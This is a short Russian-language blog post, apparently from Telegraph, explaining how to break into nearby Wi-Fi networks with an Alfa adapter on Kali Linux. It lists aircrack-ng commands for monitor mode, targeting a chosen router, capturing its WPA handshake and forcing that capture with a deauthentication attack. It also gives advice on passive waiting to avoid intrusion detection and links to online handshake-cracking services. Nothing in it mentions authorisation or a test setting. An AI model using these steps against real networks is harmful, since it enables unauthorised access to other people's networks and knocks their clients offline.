Взлом Wi-fi и работа с Alfa

Взлом Wi-fi и работа с Alfa

Genesis

https://slcon.ru/glavnaya/product/wi-fi-adapter-alfa-awus036nh - топ 1 прибор для пентестеров.

Сегодня мы с помощью него расскажем как быстро взломать wi fi поблизости.


Я работаю на Kali Linux, вот ссылка как установить драйвера Alfa на кали.


Способ взлома:

1) Установка aircrack-ng (Buster)

sudo apt-get install -y aircrack-ng


2) Посмотреть какой интерфейс у альфы:

sudo airmon-ng


3) Перевести в режим мониторинга

sudo airmon-ng start [интерфейс]


4) Смотреть доступные для атаки точки доступа

sudo airodump-ng [интерфейс-мон] --manufacturer


Взломать определенный роутер

sudo airodump-ng --bssid [MAC-address] -c [CH] -w [имя_файла] [интерфейс-мон] --ignore-negative-one

-c - канал. По умолчанию, airodump-ng скачет по каналам с 1 по 14 — это каналы 2.4 ГГц (т.е. 802.11b/g/n)

--bssid - MAC-адрес роутера

-w - имя файл рукопожатия. Можно придумать имя. В этот файл будет записано захваченное рукопожатие.

--ignore-negative-one - убирает сообщение ‘fixed channel : -1’


Видимая точка доступа показана в верхней части терминала, а подключенные клиенты в нижней.

Можно ничего не делать — достаточно просто ждать, когда кто-то подключится или переподключится естественным образом.

В основном терминале на правый верхний угол появится надпись [WPA handshake: <MAC>], говорит нам о том, что рукопожатие уже захвачено.

Если у тебя нет времени ждать, то можно форсировать процесс использованием атаки деаутентификация.

Для этого мы открываем новое второе окно терминала и набираем там команду

sudo aireplay-ng -0 10 -a [MAC-address] [интерфейс-мон] --ignore-negative-one

-0 означает деаутентификация

10 означает количество отправленных пакетов

-a - это ВSSID целевой ТД


Есть минус и плюс использования атаки деаутентификация:

Плюс - значительно ускоряется процесс получения рукопожатия

Минус - вы теряете свою невидимость.

Системы обнаружения вторжений и мониторинга в этот момент могут вас засечь. При пассивном ожидании рукопожатия вы остаётесь полностью невидимым для этих систем.


Сервисы расшифровки :

https://xsrc.ru/

airslax.com

https://forum.antichat.ru/threads/410738/

Report content on this page

Report Page

Please submit your DMCA takedown request to dmca@telegram.org